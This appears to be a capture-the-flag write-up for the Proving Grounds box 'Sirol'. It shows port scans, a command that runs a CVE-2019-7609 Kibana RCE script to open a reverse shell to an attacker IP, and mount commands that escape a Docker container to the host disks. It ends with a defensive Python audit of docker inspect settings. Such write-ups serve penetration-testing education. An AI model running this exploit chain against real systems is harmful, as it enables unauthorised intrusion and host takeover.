Sirol

Writeup for Sirol from OffSec Proving Grounds

Information Gathering

rustscan -a 192.168.241.54 --ulimit 5000

nmap -sC -sV --reason -p22,80,3306,5601,24007 192.168.241.54

Service Enumeration

Kibana (Port 5601)

Under the Management tab, we can find the version number of Kibana that is running.

Exploit

Kibana Version 6.5.0 contains an arbitrary code execution flaw in the Timelion visualizer.

Payload: python CVE-2019-7609-kibana-rce.py -u http://192.168.241.54:5601/ -host 192.168.49.241 -port 12345 --shell

Privesc

While we are already the root user, the root directory doesn't seem to have what we are looking for.

Notice that when we list the contents of the root directory, there is a .dockerenv file. This, along with the fact that our hostname is a string of alphanumeric characters, likely indicates that we are in a Docker container.

Using the command fdisk -l we can see what other disks are there.

We can then create a directory for each of the other disks and mount them.

mkdir /mnt/sda1
mkdir /mnt/sda2
mkdir /mnt/sda5

mount /dev/sda1 /mnt/sda1
mount /dev/sda2 /mnt/sda2
mount /dev/sda5 /mnt/sda5
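
For defenders: the writeup does not say how the container was started, but being able to list and mount host disks from inside it is consistent with a privileged container, or one given host devices plus CAP_SYS_ADMIN. The following is an added example, not part of the original writeup, that audits docker inspect output for those settings; the sample data, container names and function names are constructed for illustration.

```python
import json

# Constructed `docker inspect` output (assumption: not taken from the box in this writeup).
SAMPLE_INSPECT = json.loads("""
[
  {"Name": "/kibana-demo", "Config": {"User": ""},
   "HostConfig": {"Privileged": true, "CapAdd": null, "Devices": []}},
  {"Name": "/backup", "Config": {"User": ""},
   "HostConfig": {"Privileged": false, "CapAdd": ["SYS_ADMIN"],
                  "Devices": [{"PathOnHost": "/dev/sda1", "PathInContainer": "/dev/sda1",
                               "CgroupPermissions": "rwm"}]}},
  {"Name": "/web", "Config": {"User": "1000:1000"},
   "HostConfig": {"Privileged": false, "CapAdd": null, "Devices": null}}
]
""")

MOUNT_CAPS = {"SYS_ADMIN", "CAP_SYS_ADMIN", "ALL"}  # capabilities that cover mount(2)

def audit_container(c):
    """Return the settings that would let a root shell in this container reach host disks."""
    host = c.get("HostConfig") or {}
    findings = []
    if host.get("Privileged"):
        findings.append("privileged: all host devices and capabilities exposed")
    caps = {cap.upper() for cap in (host.get("CapAdd") or [])}
    devices = [d.get("PathOnHost", "") for d in (host.get("Devices") or [])]
    if caps & MOUNT_CAPS and devices:
        findings.append("CAP_SYS_ADMIN plus host devices: " + ", ".join(devices))
    elif caps & MOUNT_CAPS:
        findings.append("CAP_SYS_ADMIN added (capability required by mount(2))")
    elif devices:
        findings.append("host devices mapped: " + ", ".join(devices))
    user = (c.get("Config") or {}).get("User", "")
    if findings and user in ("", "0", "root", "0:0"):
        findings.append("runs as root inside the container")
    return findings

def audit(inspect_data):
    """Map container name -> findings, leaving out containers with no findings."""
    results = {c.get("Name", "?").lstrip("/"): audit_container(c) for c in inspect_data}
    return {name: found for name, found in results.items() if found}

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_INSPECT), indent=2))
```

On a real host, the input would come from docker inspect run over the container IDs listed by docker ps -q.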
